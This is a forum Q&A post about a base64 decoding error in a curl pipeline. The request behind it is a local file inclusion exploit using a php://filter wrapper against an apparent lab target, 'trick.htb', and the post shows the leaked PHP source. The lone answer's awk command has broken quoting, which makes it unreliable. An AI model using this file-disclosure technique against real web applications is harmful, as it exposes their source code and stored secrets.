# Trying to decode base64 from curl, but I get "base64: invalid input"

Tags: curl, base64

Trying to decode base64 from curl, but I get "base64: invalid input".

```
➜ curl -s 'preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=home' | grep -A 1 '<main id="view-panel" >' | grep -v main
            PD9waHAgaW5jbHVkZSAnZGJfY29ubmVjdC5waHAnID8+DQo8c3R5bGU+DQogICANCjwvc3R5bGU+DQoNCjxkaXYgY2xhc3M9ImNvbnRhaW5lLWZsdWlkIj4NCg0KCTxkaXYgY2xhc3M9InJvdyI+DQoJCTxkaXYgY2xhc3M9ImNvbC1sZy0xMiI+DQoJCQkNCgkJPC9kaXY+DQoJPC9kaXY+DQoNCgk8ZGl2IGNsYXNzPSJyb3cgbXQtMyBtbC0zIG1yLTMiPg0KCQkJPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4NCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjYXJkIj4NCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2FyZC1ib2R5Ij4NCiAgICAgICAgICAgICAgICAgICAgPD9waHAgZWNobyAiV2VsY29tZSBiYWNrICIuICRfU0VTU0lPTlsnbG9naW5fbmFtZSddLiIhIiAgPz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPC9kaXY+DQoJPC9kaXY+DQoNCjwvZGl2Pg0KPHNjcmlwdD4NCgkNCjwvc2NyaXB0Pg==


➜ curl -s 'preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=home' | grep -A 1 '<main id="view-panel" >' | grep -v main | base64 -d

base64: invalid input
```

I can decode using base64 separately.

```
➜ echo 'PD9waHAgaW5jbHVkZSAnZGJfY29ubmVjdC5waHAnID8+DQo8c3R5bGU+DQogICANCjwvc3R5bGU+DQoNCjxkaXYgY2xhc3M9ImNvbnRhaW5lLWZsdWlkIj4NCg0KCTxkaXYgY2xhc3M9InJvdyI+DQoJCTxkaXYgY2xhc3M9ImNvbC1sZy0xMiI+DQoJCQkNCgkJPC9kaXY+DQoJPC9kaXY+DQoNCgk8ZGl2IGNsYXNzPSJyb3cgbXQtMyBtbC0zIG1yLTMiPg0KCQkJPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4NCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjYXJkIj4NCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2FyZC1ib2R5Ij4NCiAgICAgICAgICAgICAgICAgICAgPD9waHAgZWNobyAiV2VsY29tZSBiYWNrICIuICRfU0VTU0lPTlsnbG9naW5fbmFtZSddLiIhIiAgPz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPC9kaXY+DQoJPC9kaXY+DQoNCjwvZGl2Pg0KPHNjcmlwdD4NCgkNCjwvc2NyaXB0Pg==' | base64 -d
<?php include 'db_connect.php' ?>
<style>
   
</style>

<div class="containe-fluid">

    <div class="row">
        <div class="col-lg-12">
            
        </div>
    </div>

    <div class="row mt-3 ml-3 mr-3">
            <div class="col-lg-12">
                <div class="card">
                    <div class="card-body">
                    <?php echo "Welcome back ". $_SESSION['login_name']."!"  ?>
                                        
                    </div>
                    
                </div>
            </div>
    </div>

</div>
<script>
    
</script>
```

Can anyone please help me.

Answer (score 0):

You need to strip the leading spaces. Instead of `| grep -A 1 '<main id="view-panel" >' | grep -v main`, use `| awk '/<main id="view-panel" >/' { getline; print $1 }'`.